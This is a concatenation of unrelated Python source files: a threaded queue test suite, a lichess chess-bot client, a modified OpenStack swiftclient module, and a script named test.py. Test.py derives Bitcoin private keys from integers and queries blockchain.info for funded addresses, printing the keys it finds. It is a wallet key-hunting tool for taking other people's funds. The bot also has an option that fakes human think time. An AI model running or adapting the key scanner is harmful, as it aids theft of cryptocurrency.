type(self).target_class.test_all((1, 2**10), (0, 50), *cnt_case, 2**14, 16, seed, self)
class Test_suite_large:
# target_class = TestCase_MPMC
# prod_cnt_ord = random_ordered_cycle(1, 4)
# cons_cnt_ord = random_ordered_cycle(1, 4)
if "L" in Testing_Types:
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 100), *cnt_case, 2, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 1000), *cnt_case, 3, 4, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (100, 10000), *cnt_case, 16, 4, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (1, 50000), *cnt_case, 2**16, 32, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (0, 100000), *cnt_case, 2**18, 16, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**10), (0, 50000), *cnt_case, 2**18, 32, seed, self)
class Test_suite_OOS: # out of standard; object size is not multiple of 4
# target_class = TestCase_MPMC
# prod_cnt_ord = random_ordered_cycle(1, 4)
# cons_cnt_ord = random_ordered_cycle(1, 4)
if "O" in Testing_Types:
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 1), (1, 10), *cnt_case, 2, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 3), (1, 10), *cnt_case, 2**7, 4, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((5, 7), (1, 100), *cnt_case, 2**7, 16, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((9, 11), (1, 100), *cnt_case, 2**7, 16, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((13, 15), (1, 500), *cnt_case, 2**9, 16, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((17, 19), (1, 1000), *cnt_case, 2**9, 20, seed, self)
class TestCase_MPSC(TestCase_MPMC_base):
mtmc_seed = 0
target_fn = type20_tester
class Type_1(transfer_tracker, unittest.TestCase, Test_suite_base):
target_class = TestCase_MPSC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 5)
cons_cnt_ord = itertools.cycle([1])
class Type_1L(transfer_tracker, unittest.TestCase, Test_suite_large):
target_class = TestCase_MPSC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 20)
cons_cnt_ord = itertools.cycle([1])
class Type_1O(transfer_tracker, unittest.TestCase, Test_suite_OOS):
target_class = TestCase_MPSC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 10)
cons_cnt_ord = itertools.cycle([1])
class TestCase_SPMC(TestCase_MPMC_base):
mtmc_seed = 0
target_fn = type02_tester
class Type_2(transfer_tracker, unittest.TestCase, Test_suite_base):
target_class = TestCase_SPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = itertools.cycle([1])
cons_cnt_ord = random_ordered_cycle(1, 5)
class Type_2L(transfer_tracker, unittest.TestCase, Test_suite_large):
target_class = TestCase_SPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = itertools.cycle([1])
cons_cnt_ord = random_ordered_cycle(1, 20)
class Type_2O(transfer_tracker, unittest.TestCase, Test_suite_OOS):
target_class = TestCase_SPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = itertools.cycle([1])
cons_cnt_ord = random_ordered_cycle(1, 10)
class TestCase_MPMC(TestCase_MPMC_base):
mtmc_seed = 0
target_fn = type22_tester
class Type_3(transfer_tracker, unittest.TestCase, Test_suite_base):
target_class = TestCase_MPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 5)
cons_cnt_ord = random_ordered_cycle(1, 5)
class Type_3L(transfer_tracker, unittest.TestCase, Test_suite_large):
target_class = TestCase_MPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 20)
cons_cnt_ord = random_ordered_cycle(1, 20)
class Type_3O(transfer_tracker, unittest.TestCase, Test_suite_OOS):
target_class = TestCase_MPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 10)
cons_cnt_ord = random_ordered_cycle(1, 10)
if __name__ == "__main__":
path_info = __file__.split("/")
path_info = "/".join(path_info[path_info.index("tests") :])
print(path_info)
unittest.main(argv=[""])
|
lichess_bot.py
|
import argparse
import chess
from chess.variant import find_variant
import chess.polyglot
import engine_wrapper
import model
import json
import lichess
import logging
import multiprocessing
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import (
ChunkedEncodingError,
ConnectionError,
HTTPError,
ReadTimeout,
)
from urllib3.exceptions import ProtocolError
from ColorLogger import enable_color_logging
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "1.1.4"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode("utf-8"))
control_queue.put_nowait(event)
else:
control_queue.put_nowait({"type": "ping"})
except:
pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
manager = multiprocessing.Manager()
challenge_queue = manager.list()
control_queue = manager.Queue()
control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li])
control_stream.start()
busy_processes = 0
queued_processes = 0
with logging_pool.LoggingPool(max_games + 1) as pool:
while not terminated:
event = control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "local_game_done":
busy_processes -= 1
logger.info(
"+++ Process Free. Total Queued: {}. Total Used: {}".format(
queued_processes, busy_processes
)
)
elif event["type"] == "challenge":
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
challenge_queue.append(chlng)
if challenge_config.get("sort_by", "best") == "best":
list_c = list(challenge_queue)
list_c.sort(key=lambda c: -c.score())
challenge_queue = list_c
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except:
pass
elif event["type"] == "gameStart":
if queued_processes <= 0:
logger.debug(
"Something went wrong. Game is starting and we don't have a queued process"
)
else:
queued_processes -= 1
busy_processes += 1
logger.info(
"--- Process Used. Total Queued: {}. Total Used: {}".format(
queued_processes, busy_processes
)
)
game_id = event["game"]["id"]
pool.apply_async(
play_game,
[
li,
game_id,
control_queue,
engine_factory,
user_profile,
config,
challenge_queue,
],
)
while (
queued_processes + busy_processes
) < max_games and challenge_queue: # keep processing the queue until empty or max_games is reached
chlng = challenge_queue.pop(0)
try:
logger.info(" Accept {}".format(chlng))
queued_processes += 1
response = li.accept_challenge(chlng.id)
logger.info(
"--- Process Queue. Total Queued: {}. Total Used: {}".format(
queued_processes, busy_processes
)
)
except (HTTPError, ReadTimeout) as exception:
if (
isinstance(exception, HTTPError) and exception.response.status_code == 404
): # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
queued_processes -= 1
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
# Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode("utf-8"))
game = model.Game(
initial_state,
user_profile["username"],
li.baseUrl,
config.get("abort_time", 20),
)
board = setup_board(game)
engine = engine_factory(board)
conversation = Conversation(game, engine, li, __version__, challenge_queue)
logger.info("+++ {}".format(game))
engine_cfg = config["engine"]
is_uci = engine_cfg["protocol"] == "uci"
is_uci_ponder = is_uci and engine_cfg.get("uci_ponder", False)
move_overhead = config.get("move_overhead", 1000)
polyglot_cfg = engine_cfg.get("polyglot", {})
book_cfg = polyglot_cfg.get("book", {})
ponder_thread = None
deferredFirstMove = False
ponder_uci = None
def ponder_thread_func(game, engine, board, wtime, btime, winc, binc):
global ponder_results
best_move, ponder_move = engine.search_with_ponder(board, wtime, btime, winc, binc, True)
ponder_results[game.id] = (best_move, ponder_move)
engine.set_time_control(game)
if len(board.move_stack) < 2:
while not terminated:
try:
if not polyglot_cfg.get("enabled") or not play_first_book_move(
game, engine, board, li, book_cfg
):
if not play_first_move(game, engine, board, li):
deferredFirstMove = True
break
except (HTTPError) as exception:
if exception.response.status_code == 400: # fallthrough
break
else:
moves = game.state["moves"].split()
if not board.is_game_over() and is_engine_move(game, moves):
book_move = None
best_move = None
ponder_move = None
wtime = game.state["wtime"]
btime = game.state["btime"]
if board.turn == chess.WHITE:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if (
polyglot_cfg.get("enabled")
and len(moves) <= polyglot_cfg.get("max_depth", 8) * 2 - 1
):
book_move = get_book_move(board, book_cfg)
if book_move == None:
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move, ponder_move = engine.search_with_ponder(
board, wtime, btime, game.state["winc"], game.state["binc"]
)
engine.print_stats()
else:
best_move = book_move
if is_uci_ponder and not (ponder_move is None):
ponder_board = board.copy()
ponder_board.push(best_move)
ponder_board.push(ponder_move)
ponder_uci = ponder_move.uci()
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(
target=ponder_thread_func,
args=(
game,
engine,
ponder_board,
wtime,
btime,
game.state["winc"],
game.state["binc"],
),
)
ponder_thread.start()
li.make_move(game.id, best_move)
while not terminated:
try:
binary_chunk = next(lines)
except (StopIteration):
break
try:
upd = json.loads(binary_chunk.decode("utf-8")) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if u_type == "chatLine":
conversation.react(ChatLine(upd), game)
elif u_type == "gameState":
game.state = upd
moves = upd["moves"].split()
board = update_board(board, moves[-1])
if not board.is_game_over() and is_engine_move(game, moves):
if config.get("fake_think_time") and len(moves) > 9:
delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015
accel = 1 - max(0, min(100, len(moves) - 20)) / 150
sleep = min(5, delay * accel)
time.sleep(sleep)
book_move = None
best_move = None
ponder_move = None
if not (ponder_thread is None):
move_uci = moves[-1]
if ponder_uci == move_uci:
engine.engine.ponderhit()
ponder_thread.join()
ponder_thread = None
best_move, ponder_move = ponder_results[game.id]
engine.print_stats()
else:
engine.engine.stop()
ponder_thread.join()
ponder_thread = None
ponder_uci = None
wtime = upd["wtime"]
btime = upd["btime"]
if board.turn == chess.WHITE:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if not deferredFirstMove:
if (
polyglot_cfg.get("enabled")
and len(moves) <= polyglot_cfg.get("max_depth", 8) * 2 - 1
):
book_move = get_book_move(board, book_cfg)
if best_move == None:
if book_move == None:
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move, ponder_move = engine.search_with_ponder(
board, wtime, btime, upd["winc"], upd["binc"]
)
engine.print_stats()
else:
best_move = book_move
else:
if not (book_move == None):
best_move = book_move
ponder_move = None
if is_uci_ponder and not (ponder_move is None):
ponder_board = board.copy()
ponder_board.push(best_move)
ponder_board.push(ponder_move)
ponder_uci = ponder_move.uci()
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(
target=ponder_thread_func,
args=(
game,
engine,
ponder_board,
wtime,
btime,
upd["winc"],
upd["binc"],
),
)
ponder_thread.start()
li.make_move(game.id, best_move)
else:
if not polyglot_cfg.get("enabled") or not play_first_book_move(
game, engine, board, li, book_cfg
):
play_first_move(game, engine, board, li)
deferredFirstMove = False
if board.turn == chess.WHITE:
game.ping(
config.get("abort_time", 20),
(upd["wtime"] + upd["winc"]) / 1000 + 60,
)
else:
game.ping(
config.get("abort_time", 20),
(upd["btime"] + upd["binc"]) / 1000 + 60,
)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
except (
HTTPError,
ReadTimeout,
RemoteDisconnected,
ChunkedEncodingError,
ConnectionError,
ProtocolError,
) as e:
ongoing_games = li.get_ongoing_games()
game_over = True
for ongoing_game in ongoing_games:
if ongoing_game["gameId"] == game.id:
game_over = False
break
if not game_over:
continue
else:
break
logger.info("--- {} Game over".format(game.url()))
engine.engine.stop()
engine.quit()
if not (ponder_thread is None):
ponder_thread.join()
ponder_thread = None
# This can raise queue.NoFull, but that should only happen if we're not processing
# events fast enough and in this case I believe the exception should be raised
control_queue.put_nowait({"type": "local_game_done"})
def play_first_move(game, engine, board, li):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
# need to hardcode first movetime since Lichess has 30 sec limit.
best_move = engine.first_search(board, 10000)
engine.print_stats()
li.make_move(game.id, best_move)
return True
return False
def play_first_book_move(game, engine, board, li, config):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
book_move = get_book_move(board, config)
if book_move:
li.make_move(game.id, book_move)
return True
else:
return play_first_move(game, engine, board, li)
return False
def get_book_move(board, config):
if board.uci_variant == "chess":
book = config["standard"]
else:
if config.get("{}".format(board.uci_variant)):
book = config["{}".format(board.uci_variant)]
else:
return None
with chess.polyglot.open_reader(book) as reader:
try:
selection = config.get("selection", "weighted_random")
if selection == "weighted_random":
move = reader.weighted_choice(board).move()
elif selection == "uniform_random":
move = reader.choice(board, minimum_weight=config.get("min_weight", 1)).move()
elif selection == "best_move":
move = reader.find(board, minimum_weight=config.get("min_weight", 1)).move()
except IndexError:
# python-chess raises "IndexError" if no entries found
move = None
if move is not None:
logger.info("Got move {} from book {}".format(move, book))
return move
def setup_board(game):
if game.variant_name.lower() == "chess960":
board = chess.Board(game.initial_fen, chess960=True)
elif game.variant_name == "From Position":
board = chess.Board(game.initial_fen)
else:
VariantBoard = find_variant(game.variant_name)
board = VariantBoard()
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def update_board(board, move):
uci_move = chess.Move.from_uci(move)
board.push(uci_move)
return board
def intro():
return (
r"""
. _/|
. // o\
. || ._) lichess-bot %s
. //__\
. )___( Play on Lichess with a bot
"""
% __version__
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Play on Lichess with a bot")
parser.add_argument(
"-u",
action="store_true",
help="Add this flag to upgrade your account to a bot account.",
)
parser.add_argument(
"-v",
action="store_true",
help="Verbose output. Changes log level from INFO to DEBUG.",
)
parser.add_argument("--config", help="Specify a configuration file (defaults to ./config.yml)")
parser.add_argument("-l", "--logfile", help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.v else logging.INFO,
filename=args.logfile,
format="%(asctime)-15s: %(message)s",
)
enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO)
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lichess.Lichess(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if args.u is True and is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error(
"{} is not a bot account. Please upgrade it to a bot account!".format(
user_profile["username"]
)
)
|
test.py
|
import threading
import os
import time
import wallet_random
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback
maxPage = pow(2,256) / 128
#maxPage = 904625697166532776746648320380374280100293470930272690489102837043110636675
def getRandPage():
return wallet_random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
num = (pageNum - 1) * 128 + 1
try:
for i in range(num, num + 128):
key1 = Key.from_int(i)
wif = bytes_to_wif(key1.to_bytes(), compressed=False)
key2 = Key(wif)
keyList.append(hex(i)[2:])
addrList.append(key2.address)
addrList.append(key1.address)
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + key2.address
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + key1.address
except:
pass
return [keyList, addrList, addrStr1, addrStr2]
'''
def getPage(pageNum):
try:
r = requests.get(url='http://directory.io/%d' % pageNum, timeout=5)
r = r.content
except:
return []
keys = r.split("how-this-works!/")
addrs = r.split("blockchain.info/address/")
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
for i in range(1, len(keys)):
key = keys[i].split("\"")[0]
keyList.append(key)
for i in range(1, len(addrs)):
addr = addrs[i].split("\"")[0]
addrList.append(addr)
if i % 2 == 1:
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + addr
else:
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + addr
return [keyList, addrList, addrStr1, addrStr2]
'''
def getBalances(addrStr):
balances = "security"
while True:
if "security" not in balances: break
secAddr = balances.split("effects address ")
if len(secAddr) >= 2:
secAddr = secAddr[1].split(".")[0]
addrStr = addrStr.replace(secAddr + "|", "")
addrStr = addrStr.replace("|" + secAddr, "")
try:
r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
balances = balances['addresses']
except:
print (balances)
return balances
getCount = 0
#fp_found = open("found.txt", "w+")
#fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
page = getRandPage()
pageRet = getPage(1)
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 0
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
balancesRet = getBalances(pageRet[3])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 1
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
#fp_found.flush()
#fp_fund.flush()
except:
traceback.print_exc()
break
clearScreen()
print (getCount)
break
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import glob
from twisted.internet import task
from twisted.internet import reactor
import swiftclient.scheduling
import os
import datetime, threading, time
from time import sleep
from swiftclient.shell import *
import datetime
from collections import defaultdict
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import *
from threading import Thread
from six import StringIO, text_type
from queue import Queue
from queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
from six import Iterator, string_types
import json
import swiftclient
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
logger = logging.getLogger("swiftclient.service")
global avail_bw ;
class ThreadingExample(object):
""" Threading example class
The run() method will be started and it will run in the background
until the application exits.
"""
def __init__(self, interval=1):
""" Constructor
:type interval: int
:param interval: Check interval, in seconds
"""
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
while True:
print('Doing something imporant in the background',swiftclient.shell.sum_data) ; sleep(self.interval)
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
}
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False,
'destination': None,
'fresh_metadata': False,
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'])
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: An array of 'Key: Value' strings
:param prefix: String to prepend to all of the keys in the dictionary.
reporting.
"""
headers = {}
for item in options:
split_item = item.split(':', 1)
if len(split_item) == 2:
headers[(prefix + split_item[0]).title()] = split_item[1].strip()
else:
raise SwiftError(
"Metadata parameter %s must contain a ':'.\n%s"
% (item, "Example: 'Color:Blue' or 'Size:Large'")
)
return headers
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftCopyObject(object):
"""
Class for specifying an object copy,
allowing the destination/headers/metadata/fresh_metadata to be specified
separately for each individual object.
destination and fresh_metadata should be set in options
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
